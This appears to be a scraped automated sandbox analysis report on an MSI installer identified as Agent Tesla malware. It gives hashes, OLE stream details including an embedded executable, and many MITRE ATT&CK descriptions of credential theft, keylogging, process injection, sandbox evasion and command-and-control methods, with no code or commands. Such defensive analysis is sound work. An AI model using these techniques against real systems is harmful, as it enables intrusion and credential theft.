Uniqueness

Uniqueness Score: -1.00%

Function 1D7CD44B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1046551782.000000001D7CD000.00000040.00000001.sdmp, Offset: 1D7CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1d7cd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c79a82c96f2bea8d23c52c15e4d3a50e5b6d05254578cdf5ad61183456536875
Instruction ID: 697afc32c344fa4badacffba39e84f2adb6e99bc708f4b20a8f32d61bc4bb4d3
Opcode Fuzzy Hash: c79a82c96f2bea8d23c52c15e4d3a50e5b6d05254578cdf5ad61183456536875
Instruction Fuzzy Hash: A211D376504281CFDB01CF14E5C0B16BF71FB84324F24C6AADC094B656C336D45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ot.msi

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "ot.msi"

Indicators

Summary

Streams

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 456

General

Stream Path: \x17163\x16689\x18229\x18430\x14797\x14413\x14465\x14351\x14916\x14987\x14977\x14662\x15045\x15173\x14985\x15169\x14784\x14464\x15245\x14670, File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Stream Size: 102400

General

Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 400

General

Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: ASCII text, with very long lines, with no line terminators, Stream Size: 1980

General

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre